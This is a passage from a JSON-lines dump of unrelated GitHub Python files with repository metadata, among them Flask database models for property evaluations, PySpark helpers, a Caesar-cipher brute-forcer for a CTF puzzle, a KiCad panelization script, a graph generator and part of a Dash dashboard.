= db.Column(db.String)\n market_area_type = db.Column(db.String) # Area, County, or EntireMarketArea\n market_area_id = db.Column(db.Integer, db.ForeignKey('area.id'), nullable=True)\n market_area = db.relationship('Area', uselist=False, lazy='subquery')\n market_area_county_id = db.Column(db.Integer, db.ForeignKey('county.id'), nullable=True)\n market_area_county = db.relationship('County', uselist=False, lazy='subquery')\n current_listing = db.Column(db.Boolean)\n current_listing_price = db.Column(db.Integer)\n property_sold_last_three_years = db.Column(db.Boolean)\n sale_price_string = db.Column(db.String)\n sale_price = db.Column(db.Integer)\n date_sold = db.Column(db.DateTime)\n current_use = db.Column(db.String)\n highest_and_best_use = db.Column(db.String)\n marketing_exposure_time = db.Column(db.String)\n land_assessment_tax_assessor = db.Column(db.Integer)\n building_assessment_tax_assessor = db.Column(db.Integer)\n owner = db.Column(db.String)\n property_address_id = db.Column(db.Integer, db.ForeignKey('address.id'))\n property_address = db.relationship('Address', uselist=False, lazy='subquery')\n map_parcel_number = db.Column(db.String)\n legal_physical_access = db.Column(db.Boolean)\n zoning = db.Column(db.String)\n utilities = db.Column(db.String)\n sewer = db.Column(db.String)\n gas = db.Column(db.String)\n power = db.Column(db.String)\n property_rights = db.Column(db.String)\n property_type = db.Column(db.String)\n tillable = db.Column(db.Float)\n non_tillable = db.Column(db.Float)\n irrigation_percentage = db.Column(db.Float)\n acres = db.Column(db.Float)\n evaluator = db.Column(db.String)\n date_of_inspection = db.Column(db.DateTime)\n property_rating_id = db.Column(db.Integer, db.ForeignKey('property_rating.id'))\n property_rating = db.relationship('PropertyRating', uselist=False, lazy='subquery')\n statistical_parameters_id = db.Column(db.Integer, db.ForeignKey('statistical_parameters.id'))\n statistical_parameters = db.relationship('StatisticalParameters', uselist=False, lazy='subquery')\n max = db.Column(db.Float)\n mod_max = db.Column(db.Float)\n mod_min_max = db.Column(db.Float)\n min = db.Column(db.Float)\n mod_min = db.Column(db.Float)\n stnd_deviation = db.Column(db.Float)\n median = db.Column(db.Float)\n sqrt_data_count = db.Column(db.Float)\n stnd_error = db.Column(db.Float)\n total_data_points_property = db.Column(db.Integer)\n num_properties_before_cal = db.Column(db.Integer)\n average = db.Column(db.Float)\n multiplier = db.Column(db.Float)\n value_unit_concluded = db.Column(db.Float)\n reconciled_per_unit = db.Column(db.Float)\n pdf = db.Column(db.String)\n market_trend_graph_id = db.Column(db.Integer, db.ForeignKey('market_trend_graph.id'))\n market_trend_graph = db.relationship('MarketTrendGraph', uselist=False, lazy='subquery')\n org_id = db.Column(db.Integer, db.ForeignKey('organization.id'))\n organization = db.relationship('Organization', uselist=False, lazy='subquery', backref=db.backref('evaluations', lazy='dynamic'))\n pdf_images_id = db.Column(db.Integer, db.ForeignKey('pdf_images.id'))\n pdf_images = db.relationship('PDFImages', uselist=False, lazy='subquery')\n improvements_id = db.Column(db.Integer, db.ForeignKey('improvements.id'))\n improvements = db.relationship('Improvements', uselist=False, lazy='subquery')\n custom_certification = db.Column(db.String)\n did_you_physically_inspect_property = db.Column(db.Boolean)\n tax_overhead_notes = db.Column(db.String)\n additional_exhibits_notes = db.Column(db.String)\n soils_notes = db.Column(db.String)\n flood_map_notes= db.Column(db.String)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(Evaluation, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n \n @property\n def small_serialize(self):\n return {\n 'id': self.id,\n 'improvements': self.improvements.serialize if self.improvements is not None else None,\n 'valueUnitConcluded': self.value_unit_concluded,\n 'mapParcelNumber': self.map_parcel_number,\n 'name': self.name,\n 'propertyAddress': self.property_address.serialize if self.property_address is not None else None,\n 'reconciledPerUnit': self.reconciled_per_unit,\n 'updatedAt': self.updatedAt,\n 'pdf': self.pdf\n }\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'marketAreaType': self.market_area_type,\n 'marketArea': self.market_area.serialize if self.market_area_type == 'Area' else\n self.market_area_county.serialize if self.market_area_type == 'County' else '',\n 'currentListing': self.current_listing,\n 'currentListingPrice': self.current_listing_price,\n 'propertySoldLastThreeYears': self.property_sold_last_three_years,\n 'salePriceString': self.sale_price_string,\n 'salePrice': self.sale_price,\n 'dateSold': self.date_sold,\n 'currentUse': self.current_use,\n 'highestAndBestUse': self.highest_and_best_use,\n 'marketingExposureTime': self.marketing_exposure_time,\n 'landAssessmentTaxAssessor': self.land_assessment_tax_assessor,\n 'buildingAssessmentTaxAssessor': self.building_assessment_tax_assessor,\n 'owner': self.owner,\n 'propertyAddress': self.property_address.serialize,\n 'mapParcelNumber': self.map_parcel_number,\n 'legalPhysicalAccess': self.legal_physical_access,\n 'zoning': self.zoning,\n 'utilities': self.utilities,\n 'sewer': self.sewer,\n 'gas': self.gas,\n 'power': self.power,\n 'propertyRights': self.property_rights,\n 'propertyType': self.property_type,\n 'tillable': self.tillable,\n 'nonTillable': self.non_tillable,\n 'irrigationPercentage': self.irrigation_percentage,\n 'acres': self.acres,\n 'evaluator': self.evaluator,\n 'dateOfInspection': self.date_of_inspection,\n 'propertyRating': self.property_rating.serialize,\n 'statisticalParameters': self.statistical_parameters.serialize,\n 'max': self.max,\n 'modMax': self.mod_max,\n 'modMinMax': self.mod_min_max,\n 'min': self.min,\n 'modMin': self.mod_min,\n 'stndDeviation': self.stnd_deviation,\n 'median': self.median,\n 'sqrtDataCount': self.sqrt_data_count,\n 'stndError': self.stnd_error,\n 'totalDataPointsProperty': self.total_data_points_property,\n 'numPropertiesBeforeCal': self.num_properties_before_cal,\n 'average': self.average,\n 'multiplier': self.multiplier,\n 'valueUnitConcluded': self.value_unit_concluded,\n 'reconciledPerUnit': self.reconciled_per_unit,\n 'pdf': self.pdf,\n 'marketTrendGraph': self.market_trend_graph.serialize,\n 'orgId': self.org_id,\n 'pdfImages': self.pdf_images.serialize if self.pdf_images is not None else None,\n 'improvements': self.improvements.serialize if self.improvements is not None else None,\n 'customCertification': self.custom_certification,\n 'didYouPhysicallyInspectProperty': self.did_you_physically_inspect_property,\n 'taxOverheadNotes': self.tax_overhead_notes,\n 'additionalExhibitsNotes': self.additional_exhibits_notes,\n 'soilsNotes': self.soils_notes,\n 'floodMapNotes': self.flood_map_notes,\n 'createdAt': self.createdAt,\n 'updatedAt': self.updatedAt\n }\n\n\nclass PropertyRating(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n road_frontage = db.Column(db.Integer)\n access_frontage_easement = db.Column(db.Integer)\n access_ingress_egress_quality = db.Column(db.Integer)\n contiguous_parcels = db.Column(db.Integer)\n topography = db.Column(db.Integer)\n soils = db.Column(db.Integer)\n drainage = db.Column(db.Integer)\n # irrigation = db.Column(db.Integer)\n # rivers_creeks_ponds = db.Column(db.Integer)\n # marketable_timber = db.Column(db.Integer)\n additional_field_1 = db.Column(db.String)\n additional_field_2 = db.Column(db.String)\n additional_field_3 = db.Column(db.String)\n tillable = db.Column(db.Float)\n non_tillable = db.Column(db.Float)\n irrigation_percentage = db.Column(db.Float)\n blended_result = db.Column(db.Float)\n total_subject_score = db.Column(db.Integer)\n percentage_above_below = db.Column(db.Float)\n reconciled_overall_rating = db.Column(db.String)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(PropertyRating, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'roadFrontage': self.road_frontage,\n 'accessFrontageEasement': self.access_frontage_easement,\n 'accessIngressEgressQuality': self.access_ingress_egress_quality,\n 'contiguousParcels': self.contiguous_parcels,\n 'topography': self.topography,\n 'soils': self.soils,\n 'drainage': self.drainage,\n 'additionalField1': json.loads(self.additional_field_1) if self.additional_field_1 is not None else None,\n 'additionalField2': json.loads(self.additional_field_2) if self.additional_field_2 is not None else None,\n 'additionalField3': json.loads(self.additional_field_3) if self.additional_field_3 is not None else None,\n 'tillable': self.tillable,\n 'nonTillable': self.non_tillable,\n 'irrigationPercentage': self.irrigation_percentage,\n 'blendedResult': self.blended_result,\n 'totalSubjectScore': self.total_subject_score,\n 'percentageAboveBelow': self.percentage_above_below,\n 'reconciledOverallRating': self.reconciled_overall_rating\n }\n\n\nclass StatisticalParameters(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acreage_min = db.Column(db.Float)\n acreage_max = db.Column(db.Float)\n date_of_sale_min = db.Column(db.DateTime)\n date_of_sale_max = db.Column(db.DateTime)\n outlier_percentage_exclusion = db.Column(db.Float)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(StatisticalParameters, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'acreageMin': self.acreage_min,\n 'acreageMax': self.acreage_max,\n 'dateOfSaleMin': self.date_of_sale_min,\n 'dateOfSaleMax': self.date_of_sale_max,\n 'outlierPercentageExclusion': self.outlier_percentage_exclusion\n }\n\n\nclass MarketTrendGraph(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n scatter_data = db.Column(db.String)\n trend_data = db.Column(db.String)\n m = db.Column(db.Float)\n b = db.Column(db.Float)\n R2 = db.Column(db.Float)\n\n updatedAt = db.Column(db.DateTime)\n createdAt = db.Column(db.DateTime)\n\n def __init__(self, **kwargs):\n super(MarketTrendGraph, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'scatterData': self.scatter_data,\n 'trendData': self.trend_data,\n 'm': self.m,\n 'b': self.b,\n 'R2': self.R2\n }\n\n\nclass PDFImages(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n property_pictures = db.Column(db.String)\n additional_exhibits = db.Column(db.String)\n signature = db.Column(db.String)\n # property_picture_1 = db.Column(db.LargeBinary)\n # property_picture_1_file_name = db.Column(db.String)\n # property_picture_1_file_type = db.Column(db.String)\n # property_picture_2 = db.Column(db.LargeBinary)\n # property_picture_2_file_name = db.Column(db.String)\n # property_picture_2_file_type = db.Column(db.String)\n # property_picture_3 = db.Column(db.LargeBinary)\n # property_picture_3_file_name = db.Column(db.String)\n # property_picture_3_file_type = db.Column(db.String)\n # signature_binary = db.Column(db.LargeBinary)\n # signature_file_type = db.Column(db.String)\n # signature_file_name = db.Column(db.String)\n # additional_exhibit_1_page_name = db.Column(db.String)\n # additional_exhibit_1 = db.Column(db.LargeBinary)\n # additional_exhibit_1_file_name = db.Column(db.String)\n # additional_exhibit_1_file_type = db.Column(db.String)\n # additional_exhibit_2_page_name = db.Column(db.String)\n # additional_exhibit_2 = db.Column(db.LargeBinary)\n # additional_exhibit_2_file_name = db.Column(db.String)\n # additional_exhibit_2_file_type = db.Column(db.String)\n # additional_exhibit_3_page_name = db.Column(db.String)\n # additional_exhibit_3 = db.Column(db.LargeBinary)\n # additional_exhibit_3_file_name = db.Column(db.String)\n # additional_exhibit_3_file_type = db.Column(db.String)\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(PDFImages, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n # property_pictures_json = []\n # additional_exhibits_json = []\n # for x in range(1, 4):\n # prop_name = 'property_picture_' + str(x)\n # if hasattr(self, prop_name) and getattr(self, prop_name) is not None: # Check if it is None as well.\n # property_pictures_json.append({\n # 'fileURI': getattr(self, prop_name + '_file_type') + ',' + str(base64.b64encode(getattr(self, prop_name)), 'utf-8'), \n # 'file': {'name': getattr(self, prop_name + '_file_name')}, \n # 'fileName': getattr(self, prop_name + '_file_name')})\n # additional_name = 'additional_exhibit_' + str(x)\n # if hasattr(self, additional_name) and getattr(self, additional_name) is not None:\n # additional_exhibits_json.append({\n # 'pageName': getattr(self, additional_name+'_page_name'),\n # 'fileURI': getattr(self, additional_name + '_file_type') + ',' + str(base64.b64encode(getattr(self, additional_name)), 'utf-8'),\n # 'file': {'name': getattr(self, additional_name + '_file_name')},\n # 'fileName': getattr(self, additional_name + '_file_name')\n # })\n # signature_json = {\n # 'fileURI': self.signature_file_type + ',' + str(base64.b64encode(self.signature_binary), 'utf-8'),\n # 'file': {'nane': self.signature_file_name},\n # 'fileName': self.signature_file_name\n # } if self.signature_binary is not None else None\n \n return {\n 'id': self.id,\n 'propertyPictures': json.loads(self.property_pictures) if self.property_pictures is not None else None,\n 'additionalExhibits': json.loads(self.additional_exhibits) if self.additional_exhibits is not None else None,\n 'signature': json.loads(self.signature) if self.signature is not None else None\n }\n\n\nclass Improvements(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n total_improvements_value = db.Column(db.Float)\n improvements = db.Column(db.String)\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(Improvements, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'totalImprovementsValue': self.total_improvements_value,\n 'improvements': json.loads(self.improvements) if self.improvements is not None else None\n }\n\n\nclass EvaluationSaveLog(db.Model):\n ### This is meant to capture saves/updates to an Evaluation that meet the business logic for a charge.\n ### Business Logic:\n ### 1. The Evaluation gets a PDF for the first time. (So basically the first time that they clicked\n ## Save & Download Eval)\n ### 2. The evaluation already has or has had a PDF attached to it and Evaluation name changes and\n ### then they proceed to Save & Download an Evaluation. (I will need to make sure that it is\n ### communicated to the client via the web app that Changing the name and downloading a PDF will count towards a charge)\n ### 3. The evaluation already has or has had a PDF attached to it and the address changes and\n ### they proceed to Save & Download an Evaluation.\n\n id = db.Column(db.Integer, primary_key=True)\n eval_id = db.Column(db.Integer, db.ForeignKey('evaluation.id'), nullable=True)\n evaluation = db.relationship('Evaluation', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n eval_id_perm = db.Column(db.Integer, nullable=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n user = db.relationship('User', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n timestamp = db.Column(db.DateTime, nullable=False)\n save_criteria = db.Column(db.String, nullable=True) # don't know If I will use this, but just in case.\n exempted = db.Column(db.Boolean, nullable=False)\n org_id = db.Column(db.Integer, db.ForeignKey('organization.id'), nullable=False)\n organization = db.relationship('Organization', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n has_pdf = db.Column(db.Boolean, nullable=False) # Couldn't think of a better name. If an Eval meets the valid critera, but doesn't have a pdf\n # set this field to False. This will help me if someone saves an Eval that meets the criteria, but doesn't have a PDF\n # then at a later date/time downloads a PDF with a change that doesn't meet critera. Technically since their last PDF download,\n # It will have changed, but I wouldn't say the change on the actual download.\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(EvaluationSaveLog, self).__init__(**kwargs)\n self.exempted = False\n self.timestamp = datetime.now()\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'user': self.user.serialize,\n 'timestamp': self.timestamp,\n 'saveCriteria': self.save_criteria,\n 'exempted': self.exempted,\n 'has_pdf': self.has_pdf,\n 'evaluation': {\n 'id': self.evaluation.id if self.evaluation is not None else None\n },\n 'evalId': self.eval_id_perm\n }\n","repo_name":"dk-extdev/react_sass_flask_evaluation","sub_path":"models/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":20878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22601510881","text":"from argparse import ArgumentParser, Namespace\nimport sys\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SparkSession\nfrom pathlib import Path\nfrom typing import Any\n\n\ndef unzip_packages():\n from zipfile import ZipFile\n from os import getcwd\n\n cur_dir = getcwd()\n with ZipFile(f'{cur_dir}/packages.zip', mode='r') as ar:\n ar.extractall()\n\n\nclass Log4j:\n def __init__(self, spark: SparkSession):\n conf = spark.sparkContext.getConf()\n app_id = conf.get('spark.app.id')\n app_name = conf.get('spark.app.name')\n\n log4j = spark._jvm.org.apache.log4j\n message_prefix = '<' + app_name + ' ' + app_id + '>'\n self.logger = log4j.LogManager.getLogger(message_prefix)\n\n def error(self, message: str):\n self.logger.error(message)\n\n def warn(self, message: str):\n self.logger.warn(message)\n\n def info(self, message: str):\n self.logger.info(message)\n\n\ndef start_spark(\n app_name: str,\n master: str = None,\n config: SparkConf = None,\n instance: str = None,\n enable_unzip: bool = False,\n enable_hive_support: bool = False,\n) -> SparkSession:\n\n spark_builder = (\n SparkSession\n .builder\n .appName(app_name)\n )\n\n # when remote spark can't find modules in packages.zip\n # if enable_unzip:\n # unzip_packages()\n\n if instance == 'remote_spark_shell':\n from src.connection.envs import envs\n envs = envs()\n\n\n # pkg = [\"io.delta:delta-core_2.12:2.3.0\"]\n conf = [\n # # (\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\"),\n # # (\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\"),\n # # (\"spark.sql.legacy.createHiveTableByDefault.enabled\", \"true\"),\n # # (\"spark.master\", \"cluster\"),\n # (\"spark.sql.uris\", f\"thrift://{envs['HADOOP_SERV']}:9083\"),\n # (\"hive.metastore.uris\", f\"thrift://{envs['HADOOP_SERV']}:9083\"),\n (\"spark.sql.warehouse.dir\", f\"hdfs://{envs['HADOOP_SERV']}:9000{envs['HIVE_WH']}\"),\n # ('spark.sql.catalogImplementation', 'hive'),\n # ('spark.shell.deployMode', 'cluster'),\n # ('spark.jars.packages', 'io.delta:delta-core_2.12:2.3.0'),\n ]\n\n conf = SparkConf().setAll(conf)\n spark_builder = spark_builder.config(conf=conf)\n\n from delta.pip_utils import configure_spark_with_delta_pip\n spark_builder = configure_spark_with_delta_pip(spark_builder)\n\n if enable_hive_support:\n spark_builder = spark_builder.enableHiveSupport()\n\n if config:\n spark_builder = spark_builder.config(conf=config)\n\n if master:\n spark_builder = spark_builder.master(master)\n\n spark = spark_builder.getOrCreate()\n\n return spark\n\n\ndef get_spark_logger(spark: SparkSession) -> Log4j:\n spark_logger = Log4j(spark)\n\n spark_logger.info(\"command line args\" + str(sys.argv))\n spark_logger.info(\"Spark session created\")\n\n return spark_logger\n\n\ndef get_folder_content(spark: SparkSession, path: str) -> list:\n sc = spark.sparkContext\n hadoop = sc._jvm.org.apache.hadoop\n fs = hadoop.fs.FileSystem\n conf = hadoop.conf.Configuration()\n hadoop_path = hadoop.fs.Path(path)\n content = [Path(str(f.getPath())).name for f in fs.get(conf).listStatus(hadoop_path)]\n return content\n\n\nclass ArgsBuilder:\n def __init__(self, description: str = ''):\n self._parser = ArgumentParser(description=description)\n\n def with_arg(self, name: str, type: Any, **kwargs):\n self._parser.add_argument(name, type=type, **kwargs)\n return self\n\n def build(self) -> Namespace:\n return self._parser.parse_args()\n\n\ndef get_hdfs_folder_content(sc: SparkContext, path: str) -> list:\n hadoop = sc._jvm.org.apache.hadoop\n fs = hadoop.fs.FileSystem\n conf = hadoop.conf.Configuration()\n path = hadoop.fs.Path(path)\n\n content = [Path(str(f.getPath())).name for f in fs.get(conf).listStatus(path)]\n return content\n\n\ndef read_sql_file(path: str) -> str:\n with open(path) as file:\n sql = file.read()\n return sql\n","repo_name":"Megacinder/spot","sub_path":"src/spark/spark_utils.py","file_name":"spark_utils.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22029452652","text":"class DistObj:\n def __init__(self, aname):\n self.name = aname\n self.url = ''\n self.description = ''\n self.protocol = ''\n self.appprofile = ''\n self.functioncode = ''\n self.functiontext = ''\n self.distorg = ''\n self.formatlist = []\n\n def dump(self):\n return {\"adistobj\": {'name': self.name,\n 'url': self.url,\n 'description': self.description,\n 'protocol': self.protocol,\n 'appprofile': self.appprofile,\n 'functioncode': self.functioncode,\n 'functiontext': self.functiontext,\n 'distorg': self.distorg,\n 'formatlist': self.formatlist\n }}","repo_name":"ShutongLi/cinergi_dispatch_dev","sub_path":"cinergy_with_lib/Distribution.py","file_name":"Distribution.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6152260342","text":"'''\nsimple caesar decryption\ncaesar encryption based on rotating operation.\nfunction use n and encryptedText parameter.\nn means rotation index, encryptedText is simple caesar encrypted text\ndecryption formula is\nD(x) = (x - n) % 26\n26 is the number of letters in british alphabet\nx is a encryptedText\nn is a rotation value.\nCreated on 21 Agu 2017\n@author: FIRAT\n'''\nimport string\nletters = string.ascii_letters\ndef caesar_decryption(n,encryptedText):\n predictedText=''\n lengthOfEncryptedText = len(encryptedText)\n for index,letter in enumerate(encryptedText):\n currentIndex = letters.index(letter)\n predictedIndex = (currentIndex - n) % 26\n predictedLetter = letters[predictedIndex]\n predictedText = predictedText+predictedLetter\n return predictedText\n\nfor i in range(26):\n print('CASE = '+str(i))\n print(caesar_decryption(i,'SYNTPrfneVfPbbyOhgAbgFrpher'))","repo_name":"firatpayalan/ringzer0challenges","sub_path":"cryptography/some_martian_message.py","file_name":"some_martian_message.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9087889626","text":"import math\nclass Solution:\n def mySqrt(self, x: int) -> int:\n return math.floor(self.findSqrt(0, x, x))\n \n def findSqrt(self, start: float, end: float, x: int) -> float:\n if (end == 1 or end ==0):\n return end\n mid = (start+end)/2 \n square = mid* mid\n if int(round(square,6)) == round(x,6):\n return mid\n elif (square > x):\n return self.findSqrt(start, mid,x)\n else:\n return self.findSqrt(mid, end, x)\n \n def runtests(self):\n if (self.mySqrt(1) ==1 and self.mySqrt(0) ==0 and self.mySqrt(8) ==2 and self.mySqrt(100) ==10 \\\n and self.mySqrt(9) ==3 and self.mySqrt(16) ==4):\n print(True)\n else:\n print(False)\n \nsol = Solution()\nsol.runtests()","repo_name":"dhrumil-shah/leetcode-python","sub_path":"69-Sqrt(x).py","file_name":"69-Sqrt(x).py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26168041859","text":"from kikit import panelize\nimport shapely\nimport pcbnew\nimport sys\n\ntabWidth = panelize.fromMm(65)\nslotWidth = panelize.fromMm(2.5)\npanelOrigin = pcbnew.wxPointMM(150, 40)\n\npanel = panelize.Panel()\n\npos1 = panel.appendBoard(sys.argv[1], panelOrigin - pcbnew.wxPointMM(1.5, 0),\n origin=panelize.Origin.TopRight, tolerance=panelize.fromMm(5))\npos2 = panel.appendBoard(sys.argv[1], panelOrigin + pcbnew.wxPointMM(1.5, 0),\n origin=panelize.Origin.BottomRight, tolerance=panelize.fromMm(5),\n rotationAngle=1800)\n\ntabs, cuts = panel.layerToTabs(\"Cmts.User\", panelize.fromMm(5))\npanel.appendSubstrate(tabs)\npanel.addMillFillets(panelize.fromMm(1))\n\npanel.makeMouseBites(cuts, panelize.fromMm(0.5), panelize.fromMm(0.75))\n\npanel.save(sys.argv[2])\n","repo_name":"RoboticsBrno/RB0002-BatteryPack","sub_path":"scripts/panelizeBattery.py","file_name":"panelizeBattery.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"6221648957","text":"import networkx # type: ignore\nfrom graph_helper.distance import distance # type: ignore\n\nfrom itertools import product, combinations\nfrom typing import Optional\nimport random\n\n\ndef square_subgraph(\n side_length: int,\n num_nodes: int,\n num_targets: Optional[int] = None,\n node_att: Optional[dict] = None,\n node_seed: int = 13,\n param_seed: int = 13,\n taxicab: bool = True,\n blind: bool = False,\n) -> networkx.DiGraph:\n \"\"\"Square Subgraph\n The graph nodes are randomly chosen points of grid of size ‹side_length› ⨉ ‹side_length›.\n ‹num_nodes› nodes are chosen. The graph edges are computed in the taxicab distance metric by\n default. Euclidean metric is set by ‹taxicab=False›.\n\n Args:\n Side Length - side_length: side length of the original grid\n Number of nodes - num_nodes: number of the chosen nodes\n Number of Targets - num_targets: number of targets ( <= num_nodes; if None, it equals to num_nodes)\n Node Attributes - node_att: optional attributes updating the default values\n Node RNG seed - node_seed: the seed for the random generator - for nodes\n Parameter RNG seed - param_seed: the seed for the random generator - for parameters\n Use taxicab - taxicab: usage of taxicab or Euclidean metric\n Random node blindness - blind: True for random blindness in nodes\n \n Returns:\n Graph: The generated networkx graph\n\n Backward compatibility:\n Sub_g_6_n_01.in is generated by square_subgraph(6, 10, node_seed=1)\n \"\"\"\n # safety check\n if not (1 <= num_nodes <= side_length * side_length):\n raise AttributeError(\n f\"Error: wrong value for parameter num_nodes, \"\n f\"not (1 <= {num_nodes} <= {side_length * side_length}).\"\n )\n\n if num_targets is None:\n num_targets = num_nodes\n\n if num_nodes < num_targets:\n raise AttributeError(\n f\"Error: wrong value for parameter num_targets, not ({num_targets} <= {num_nodes}).\"\n )\n\n # choose the nodes\n pool = [edge for edge in product(range(side_length), repeat=2)]\n random.seed(node_seed)\n random.shuffle(pool)\n chosen_nodes = pool[:num_nodes]\n chosen_targets = chosen_nodes[:num_targets]\n chosen_nodes.sort()\n\n # compute distances/edges\n edges_dist = [\n distance(*edge, taxicab=taxicab) for edge in combinations(chosen_nodes, 2)\n ]\n\n # edge-length statistics\n max_edge = max(edges_dist)\n mean_edge = sum(edges_dist) / len(edges_dist)\n attack_time = (\n int(max_edge + mean_edge + 3) if taxicab else int(2 * max_edge + mean_edge)\n )\n\n random.seed(param_seed)\n\n nodes = []\n for node in chosen_nodes:\n node_attributes = dict(\n value=random.randint(180, 200),\n attack_len=attack_time,\n blindness=random.randint(0, 20) / 100 if blind else 0,\n memory=4,\n target=(node in chosen_targets),\n )\n node_attributes.update(node_att or {})\n nodes.append((node, node_attributes))\n\n edges = []\n for edge, dist in zip(combinations(chosen_nodes, 2), edges_dist):\n edges.append((*edge, dict(len=dist)))\n\n graph = networkx.Graph()\n graph.add_nodes_from(nodes)\n graph.add_edges_from(edges)\n graph = graph.to_directed()\n graph.name = f\"square_subgraph_s{side_length}_n{num_nodes}_t{num_targets}\"\n\n return graph\n","repo_name":"pitris90/map_editor","sub_path":"graph_templates/square_subgraph.py","file_name":"square_subgraph.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38133600397","text":"import dash\nfrom dash import html\nfrom dash import dcc\nfrom dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\n\nimport pandas as pd\n\nfrom data.query import get_dash_dataframe\n\ndash.register_page(__name__)\n\ndf_temp_raw, df_routes_raw = get_dash_dataframe('trips')\ndf_temp = df_temp_raw.reset_index(drop=True)\ndf_routes = df_routes_raw.loc[df_routes_raw['record_id'] == df_routes_raw['record_id'].max()].reset_index(drop=True)\n\ncss_dict_h2 = {\n 'height': '15%', \n 'textAlign': 'center',\n 'display': 'flex',\n 'alignItems': 'center',\n 'justifyContent': 'center',\n 'marginTop': '80px'\n}\n\ncss_dict_h4 = {\n 'textAlign': 'center',\n 'display': 'flex',\n 'alignItems': 'center',\n 'justifyContent': 'center',\n 'marginTop': '0'\n}\n\ncss_dict_card = {\n 'backgroundColor': 'white',\n 'height': '100%',\n 'width': '100%',\n 'margin': '0',\n 'padding': '0'\n}\n\ndef create_location_layout(id_prefix, default_value, css_h2_pattern=None, css_h4_pattern=None,css_card_pattern=None):\n return dbc.Card([\n dcc.Dropdown(\n id=f'{id_prefix}-location-dropdown',\n options=[{'label': origin, 'value': origin} for origin in df_routes['origin'].unique()],\n value=default_value,\n style={'width': '100%'}\n ),\n html.H1(id=f'{id_prefix}-location-name', children=default_value, style={'textAlign': 'center', 'display': 'flex', 'alignItems': 'center', 'justifyContent': 'center'}),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-precip_mm', style=css_h2_pattern),\n html.H4('Precipitação (mm)', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-humidity', style=css_h2_pattern),\n html.H4('Umidade (%)', style=css_h4_pattern),\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-condition', style=css_h2_pattern),\n html.H4('Condição do Clima', 